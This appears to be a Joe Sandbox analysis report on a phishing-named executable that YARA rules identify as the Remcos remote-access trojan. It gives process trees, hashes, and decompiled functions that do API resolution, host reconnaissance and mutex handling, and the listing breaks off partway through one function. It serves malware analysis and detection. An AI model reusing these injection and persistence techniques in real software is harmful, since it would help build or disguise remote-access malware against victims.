Sep 7, 2021 18:17:11.782536983 CEST	162.159.135.233	443	192.168.2.5	49708	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe PID: 5256 Parent PID: 1456

General

Start time:	18:16:33
Start date:	07/09/2021
Path:	C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe'
Imagebase:	0x400000
File size:	792576 bytes
MD5 hash:	06534C059B111776B838F793C6444622
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: Cshgvzx.exe PID: 5384 Parent PID: 3472

General

Start time:	18:16:52
Start date:	07/09/2021
Path:	C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe'
Imagebase:	0x400000
File size:	792576 bytes
MD5 hash:	06534C059B111776B838F793C6444622
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: mobsync.exe PID: 4692 Parent PID: 5256

General

Start time:	18:16:59
Start date:	07/09/2021
Path:	C:\Windows\SysWOW64\mobsync.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\mobsync.exe
Imagebase:	0x7ff797770000
File size:	93184 bytes
MD5 hash:	44C19378FA529DD88674BAF647EBDC3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.492585881.00000000030E7000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.492970715.0000000010590000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.492970715.0000000010590000.00000040.00000001.sdmp, Author: unknown
Reputation:	moderate

Chronological Activities

Analysis Process: Cshgvzx.exe PID: 5296 Parent PID: 3472

General

Start time:	18:17:00
Start date:	07/09/2021
Path:	C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe'
Imagebase:	0x400000
File size:	792576 bytes
MD5 hash:	06534C059B111776B838F793C6444622
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: dialer.exe PID: 6544 Parent PID: 5384

General

Start time:	18:17:20
Start date:	07/09/2021
Path:	C:\Windows\SysWOW64\dialer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0xe10000
File size:	32768 bytes
MD5 hash:	F176211F7372248224D02AC023573870
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.331608026.0000000002F98000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.331771013.0000000010590000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.331771013.0000000010590000.00000040.00000001.sdmp, Author: unknown
Reputation:	moderate

Chronological Activities

Analysis Process: secinit.exe PID: 6672 Parent PID: 5296

General

Start time:	18:17:32
Start date:	07/09/2021
Path:	C:\Windows\SysWOW64\secinit.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\secinit.exe
Imagebase:	0x12a0000
File size:	9728 bytes
MD5 hash:	174A363BB5A2D88B224546C15DD10906
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.356991304.0000000010590000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.356991304.0000000010590000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.356879289.00000000006E8000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe PID: 5256 Parent PID: 1456 RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exeCOMMON

Executed Functions

Non-executed Functions

Function 021BD330, Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.237677575.00000000021BC000.00000004.00000001.sdmp, Offset: 021BC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_21bc000_RFQ-Order_Sheet#43254363-Sept-21_signed-copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55454b7d95c3e3a170a3c25e9c319713375dc4a076ac51a52c5a9538ffe09cb
Instruction ID: 389c67746158bf61c5bb7db0f9705038494cfb49944056de16d42e24aa30c81a
Opcode Fuzzy Hash: c55454b7d95c3e3a170a3c25e9c319713375dc4a076ac51a52c5a9538ffe09cb
Instruction Fuzzy Hash: BD613075A8420DBEEB16DAE8CC85FEFB7BD9F08704F5440A1E644E6181D7B89A448F60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mobsync.exe PID: 4692 Parent PID: 5256 mobsync.exeCOMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.3%
Total number of Nodes:	593
Total number of Limit Nodes:	25

Executed Functions

Function 0040D072, Relevance: 84.1, APIs: 28, Strings: 20, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D072() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x46bd2c = _t2;
				if(_t2 == 0) {
					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x46bd20 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x46bd2c == 0) {
					 *0x46bd20 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x46bd28 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x46bd14 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x46bd24 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x46bd18 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x46bd1c = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46bd10 = _t24;
				return _t24;
			}

0x0040d085
0x0040d08e
0x0040d096
0x0040d09d
0x0040d0ae
0x0040d0ae
0x0040d0c9
0x0040d0ce
0x0040d0df
0x0040d0df
0x0040d0fd
0x0040d111
0x0040d125
0x0040d139
0x0040d14d
0x0040d161
0x0040d175
0x0040d189
0x0040d19a
0x0040d1a2
0x0040d1a6
0x0040d1ac

APIs

LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00000000,Remcos-ZXIQGD,00000001,0040C86E), ref: 0040D085
GetProcAddress.KERNEL32(00000000), ref: 0040D08E
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040D0A9
GetProcAddress.KERNEL32(00000000), ref: 0040D0AC
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040D0BD
GetProcAddress.KERNEL32(00000000), ref: 0040D0C0
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040D0DA
GetProcAddress.KERNEL32(00000000), ref: 0040D0DD
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040D0EE
GetProcAddress.KERNEL32(00000000), ref: 0040D0F1
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040D102
GetProcAddress.KERNEL32(00000000), ref: 0040D105
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040D116
GetProcAddress.KERNEL32(00000000), ref: 0040D119
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040D12A
GetProcAddress.KERNEL32(00000000), ref: 0040D12D
GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040D13E
GetProcAddress.KERNEL32(00000000), ref: 0040D141
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040D152
GetProcAddress.KERNEL32(00000000), ref: 0040D155
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040D166
GetProcAddress.KERNEL32(00000000), ref: 0040D169
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040D17A
GetProcAddress.KERNEL32(00000000), ref: 0040D17D
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040D18E
GetProcAddress.KERNEL32(00000000), ref: 0040D191
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040D19F
GetProcAddress.KERNEL32(00000000), ref: 0040D1A2

Strings

IsUserAnAdmin, xrefs: 0040D12F
NtUnmapViewOfSection, xrefs: 0040D0E4
Kernel32.dll, xrefs: 0040D0A4, 0040D0D5
Shell32, xrefs: 0040D134
GetMonitorInfoW, xrefs: 0040D17F
SetProcessDEPPolicy, xrefs: 0040D143
kernel32.dll, xrefs: 0040D0F8
user32, xrefs: 0040D15C, 0040D170, 0040D184
Shlwapi.dll, xrefs: 0040D195
GetComputerNameExW, xrefs: 0040D11B
GetModuleFileNameExW, xrefs: 0040D0B3, 0040D0D0
GetModuleFileNameExA, xrefs: 0040D07B, 0040D09F
EnumDisplayMonitors, xrefs: 0040D16B
Remcos-ZXIQGD, xrefs: 0040D079
Psapi.dll, xrefs: 0040D080, 0040D0B8
kernel32, xrefs: 0040D10C, 0040D120, 0040D148
IsWow64Process, xrefs: 0040D107
EnumDisplayDevicesW, xrefs: 0040D157
ntdll.dll, xrefs: 0040D0E9
GlobalMemoryStatusEx, xrefs: 0040D0F3

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$Remcos-ZXIQGD$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
API String ID: 551388010-2392781893
Opcode ID: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
Instruction ID: 029b01f258c961e34356c9f3640987a8bc8548ac7ec401a199099fba32c80220
Opcode Fuzzy Hash: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
Instruction Fuzzy Hash: 10218EA0E8035875DA20BBB66C4DE1B2E58DA84B957214C27F205D7191FBFCC5408FAF

Uniqueness

Uniqueness Score: -1.00%

Function 00404E64, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00404E64(void* __ecx, intOrPtr _a4, char _a8) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __edi;
				intOrPtr _t66;
				void* _t68;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x50)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t66 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x46bb07;
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_t50 = "%02i:%02i:%02i:%03i [Info] ";
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E004047F8(__eflags, L00401F75(E0040530D(_t50,  &_v44, E00402064("%02i:%02i:%02i:%03i [Info] ",  &_v68, _t50), _t66, __eflags, "Connection KeepAlive enabled\n")), _v20.wHour & 0x0000ffff);
						L00401FA7();
						L00401FA7();
						_push(_t66);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E004047F8(__eflags, L00401F75(E0040530D(_t50,  &_v68, E00402064(_t50,  &_v44, _t50), _t66, __eflags, "Connection KeepAlive timeout: %i\n")), _v20.wHour & 0x0000ffff);
						L00401FA7();
						L00401FA7();
					}
				} else {
					 *((char*)(__ecx + 0x64)) = 1;
				}
				 *((intOrPtr*)(_t68 + 0x5c)) = _t66;
				 *((char*)(_t68 + 0x50)) = 1;
				 *((intOrPtr*)(_t68 + 0x54)) = CreateEventA(0, 0, 0, 0);
				CreateThread(0, 0, E00405154, _t68, 0, 0); // executed
				return 1;
			}

0x00404e6c
0x00404e73
0x00404f6c
0x00000000
0x00404f6c
0x00404e7d
0x00404e80
0x00404e8b
0x00404e92
0x00404e9c
0x00404ea9
0x00404eae
0x00404eb3
0x00404eb8
0x00404edc
0x00404ee7
0x00404eef
0x00404efb
0x00404efc
0x00404f01
0x00404f06
0x00404f2a
0x00404f35
0x00404f3d
0x00404f3d
0x00404e82
0x00404e82
0x00404e82
0x00404f42
0x00404f4b
0x00404f5f
0x00404f62
0x00000000

APIs

GetLocalTime.KERNEL32(00000001,0046C238,0046C768,00000000,?,?,?,?,?,?,?,?,?,?,?,00411F68), ref: 00404E9C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C238,0046C768,00000000), ref: 00404F4F
CreateThread.KERNEL32 ref: 00404F62

Strings

Connection KeepAlive enabled, xrefs: 00404EBE
%02i:%02i:%02i:%03i [Info] , xrefs: 00404EAE, 00404EC3, 00404F11
Connection KeepAlive timeout: %i, xrefs: 00404F0C

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
API String ID: 2532271599-119634454
Opcode ID: 2b4aa7496cacf094a2853a83c06df9a1e8dd4606669089403e6d0537e4977a3a
Instruction ID: b88e69a303175f26de57f97839cf358520cb82ed0235bef6c6ccbc9b6e343297
Opcode Fuzzy Hash: 2b4aa7496cacf094a2853a83c06df9a1e8dd4606669089403e6d0537e4977a3a
Instruction Fuzzy Hash: 3C3150A1900254BACB10EBA68C09DBFBBBCAB95705F00007FF941B21D2EB7C9A45C775

Uniqueness

Uniqueness Score: -1.00%

Function 0040D455, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E0040D455() {
				signed int _v32;
				void* _t13;
				void* _t22;
				signed int _t61;
				void* _t63;
				void* _t64;
				void* _t66;

				_t63 = (_t61 & 0xfffffff8) - 0x20;
				while(1) {
					_v32 = _v32 & 0x00000000;
					_t52 = L00401F75(0x46c518);
					E00410275(_t10, "override",  &_v32);
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_push(1);
						_t67 = _t63 - 0x18;
						E00407352(0x46c500, _t63 - 0x18, _t52, __eflags, 0x46c500);
						_push(L"pth_unenc");
						E0041053C(0x80000001, L00401ECB(L00416C32( &_v32, 0x46c518)));
						L00401ED0();
						_push(1);
						E00402064(0x46c500, _t67 + 0x20 - 0x18, "3.1.5 Pro");
						_push("v");
						E00410497(0x46c518, L00401F75(0x46c518));
						L0040FB4B();
						ExitProcess(0);
					}
					_t74 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8); // executed
						continue;
					}
					E0040B107();
					L5:
					_push(1);
					_t64 = _t63 - 0x18;
					E00407352(0x46c500, _t64, _t52, _t74, 0x46c500);
					_push(L"pth_unenc");
					E0041053C(0x80000001, L00401ECB(L00416C32( &_v32, 0x46c518)));
					L00401ED0();
					_push(1);
					_t66 = _t64 + 0x20 - 0x18;
					E00402064(0x46c500, _t66, "3.1.5 Pro");
					_push("v");
					E00410497(0x46c518, L00401F75(0x46c518));
					_t63 = _t66 + 0x20;
					goto L6;
				}
			}

0x0040d45b
0x0040d46a
0x0040d46a
0x0040d480
0x0040d482
0x0040d48d
0x0040d490
0x00000000
0x00000000
0x0040d492
0x0040d495
0x0040d514
0x0040d516
0x0040d51c
0x0040d521
0x0040d53f
0x0040d54b
0x0040d550
0x0040d55c
0x0040d561
0x0040d56f
0x0040d577
0x0040d57e
0x0040d57e
0x0040d497
0x0040d49a
0x0040d504
0x0040d509
0x00000000
0x0040d509
0x0040d49c
0x0040d4a1
0x0040d4a1
0x0040d4a3
0x0040d4a9
0x0040d4ae
0x0040d4cc
0x0040d4d8
0x0040d4dd
0x0040d4df
0x0040d4e9
0x0040d4ee
0x0040d4fc
0x0040d501
0x00000000
0x0040d501

APIs

Part of subcall function 00410275: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
Part of subcall function 00410275: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,0046C518), ref: 004102B3
Part of subcall function 00410275: RegCloseKey.ADVAPI32(?), ref: 004102BE

Sleep.KERNEL32(00000BB8), ref: 0040D509
ExitProcess.KERNEL32 ref: 0040D57E

Strings

pth_unenc, xrefs: 0040D4AE, 0040D521
3.1.5 Pro, xrefs: 0040D4E4, 0040D557
override, xrefs: 0040D474

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.1.5 Pro$override$pth_unenc
API String ID: 2281282204-3883831071
Opcode ID: cc59dc379ec002e9766c1a46d202858bb7c83480d938336b2ea334370986f35f
Instruction ID: c40a5223718f3a957b604b9da94b8c1faed2f64ca342b4f7b91d7ee91612d3b8
Opcode Fuzzy Hash: cc59dc379ec002e9766c1a46d202858bb7c83480d938336b2ea334370986f35f
Instruction Fuzzy Hash: F221F371F4030027D608BAB68D57B6E3556ABC0718F50443EF9026B2D2FEBD9A44879F

Uniqueness

Uniqueness Score: -1.00%

Function 004166F6, Relevance: 3.0, APIs: 2, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E004166F6(void* __ecx, void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v36;
				char _v60;
				char _v92;
				short _v604;
				void* _t26;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_v8 = 0x10;
				_t38 = __ecx;
				 *0x46beb0(1,  &_v92,  &_v8);
				_v12 = 0x100;
				GetUserNameW( &_v604,  &_v12); // executed
				E00403086(_t26, _t38, E004043E5(_t26,  &_v36,  &_v92, _t39, E0040425F(_t26,  &_v60, "/")), __edi, _t39,  &_v604);
				L00401ED0();
				L00401ED0();
				return _t38;
			}

0x004166f6
0x00416703
0x0041670e
0x00416713
0x0041671c
0x0041672b
0x00416756
0x0041675f
0x00416767
0x00416772

APIs

GetComputerNameExW.KERNEL32(00000001,?,?,0046C578), ref: 00416713
GetUserNameW.ADVAPI32 ref: 0041672B

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: e63d365084a0da650c03e9134c7a02d4899d3f5aa9b0b360d4a9b8931d11551a
Instruction ID: 2614f2d36f30314c3128fc669825ed4f87fcc606c6fc04f15beb21360d1ce151
Opcode Fuzzy Hash: e63d365084a0da650c03e9134c7a02d4899d3f5aa9b0b360d4a9b8931d11551a
Instruction Fuzzy Hash: E201FB7290021CABCB14EBD1DC45AEEB77CEF44305F10016AF905B31A5EEB46B898BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D585, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040D585(void* __ecx) {
				char _v8;
				void* _t8;
				void* _t12;

				_push(__ecx);
				_t12 = __ecx;
				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3); // executed
				E00402064(_t8, _t12,  &_v8);
				return _t12;
			}

0x0040d588
0x0040d58f
0x0040d599
0x0040d5a5
0x0040d5b0

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,0041183A,0046C238,0046C5B4,0046C238,00000000,0046C238,00000000,0046C238,3.1.5 Pro), ref: 0040D599

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a07a1ce40a41c093d95191d2b7a5674b9c3db788a72f9476dc24bfa2ccb41bb6
Instruction ID: 69531985b6b4d48a761ac155c29f6ab083136604f04839415152952db1762f43
Opcode Fuzzy Hash: a07a1ce40a41c093d95191d2b7a5674b9c3db788a72f9476dc24bfa2ccb41bb6
Instruction Fuzzy Hash: 92D05B3074031CB7D914D6959D0EEAAB79CD701F52F0001A6BB04D72C0D9E15F0087E1

Uniqueness

Uniqueness Score: -1.00%

Function 0042F1CD, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042F1CD() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0042F1D9); // executed
				return _t1;
			}

0x0042f1d2
0x0042f1d8

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002F1D9,0042EF00), ref: 0042F1D2

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
Instruction ID: cbbfc4c934c794425517924e3dd5babbab0d2174eef7e37b5e0b749d7271a00e
Opcode Fuzzy Hash: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040C641, Relevance: 60.3, APIs: 16, Strings: 18, Instructions: 769
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0040C641(void* __edx, void* __eflags, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t69;
				void* _t76;
				void** _t83;
				void* _t87;
				CHAR* _t90;
				long _t92;
				int _t94;
				char _t97;
				void* _t98;
				void* _t102;
				void* _t118;
				void* _t119;
				char _t127;
				char* _t129;
				signed char* _t131;
				signed char* _t133;
				void* _t136;
				void* _t138;
				void* _t152;
				void* _t155;
				intOrPtr _t157;
				void* _t158;
				CHAR* _t174;
				intOrPtr* _t177;
				void* _t179;
				void* _t185;
				char* _t188;
				void* _t191;
				char* _t195;
				void* _t202;
				signed short* _t206;
				void* _t207;
				void* _t208;
				signed int _t209;
				void* _t215;
				CHAR* _t221;
				void* _t223;
				char* _t226;
				char* _t228;
				intOrPtr* _t230;
				void* _t232;
				intOrPtr* _t237;
				intOrPtr* _t241;
				void* _t243;
				void* _t251;
				void* _t262;
				void* _t265;
				struct _SECURITY_ATTRIBUTES* _t266;
				int _t269;
				char* _t352;
				signed int _t374;
				signed int _t378;
				int _t380;
				signed int _t386;
				signed int _t389;
				intOrPtr _t419;
				void* _t429;
				void* _t431;
				signed int _t447;
				void* _t450;
				char* _t457;
				void* _t458;
				char* _t461;
				void* _t463;
				void* _t468;
				char* _t473;
				intOrPtr* _t477;
				void* _t480;
				void* _t481;
				void* _t482;
				signed int _t488;
				void* _t491;
				void* _t492;
				void* _t493;
				void* _t495;
				void* _t501;
				void* _t502;

				_t440 = __edx;
				_push(_t265);
				L0040CFBE( &_v724, __edx, __eflags);
				_t491 = (_t488 & 0xfffffff8) - 0x2f4;
				E004020CC(_t265, _t491, __edx, __eflags, 0x46c59c);
				_t492 = _t491 - 0x18;
				E004020CC(_t265, _t492, __edx, __eflags,  &_v728);
				_t69 = L00416DD0( &_v756, __edx);
				_t493 = _t492 + 0x30;
				E0040D7F8(__edx, _t69);
				L00401E54( &_v760, __edx);
				_t281 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t457 = 0x46c578;
					__eflags =  *((char*)(L00401F75(L00401E29(0x46c578, _t440, __eflags, 3))));
					 *0x46bb05 = __eflags != 0;
					_t76 = E0040530D(_t265,  &_v756, E004075E8( &_v780, "Software\\", __eflags, L00401E29(0x46c578, _t440, __eflags, 0xe)), 0x46c578, __eflags, "\\");
					_t467 = 0x46c518;
					L00401FB1(0x46c518, _t75, 0x46c518, _t76);
					L00401FA7();
					L00401FA7();
					_t266 = 0;
					L00401E29(0x46c578, _t75, __eflags, 0x32);
					__eflags =  *(E004051EA(0));
					 *0x46bd4e = __eflags != 0;
					L00401E29(0x46c578, _t75, __eflags, 0x33);
					_t83 = E004051EA(0);
					__eflags =  *_t83;
					 *0x46bd4f =  *_t83 != 0;
					__eflags =  *0x46bd4e - _t266; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t266;
						_t468 = OpenMutexA(0x100000, _t266, "Remcos_Mutex_Inj");
						__eflags = _t468;
						if(_t468 != 0) {
							WaitForSingleObject(_t468, 0xea60);
							CloseHandle(_t468);
						}
						_t443 = L00401F75(0x46c518); // executed
						_t87 = E00410275(_t86, "Inj",  &_v776); // executed
						__eflags = _t87;
						if(__eflags != 0) {
							_t443 = L00401F75(0x46c518);
							E004106D2(_t256, __eflags, "Inj");
						}
						L00401F8D(0x46c548, L00401E29(_t457, _t443, __eflags, 0xe));
						_t90 = L00401F75(0x46c548);
						_t458 = 0;
						_t269 = 1;
						CreateMutexA(0, 1, _t90); // executed
						_t92 = GetLastError();
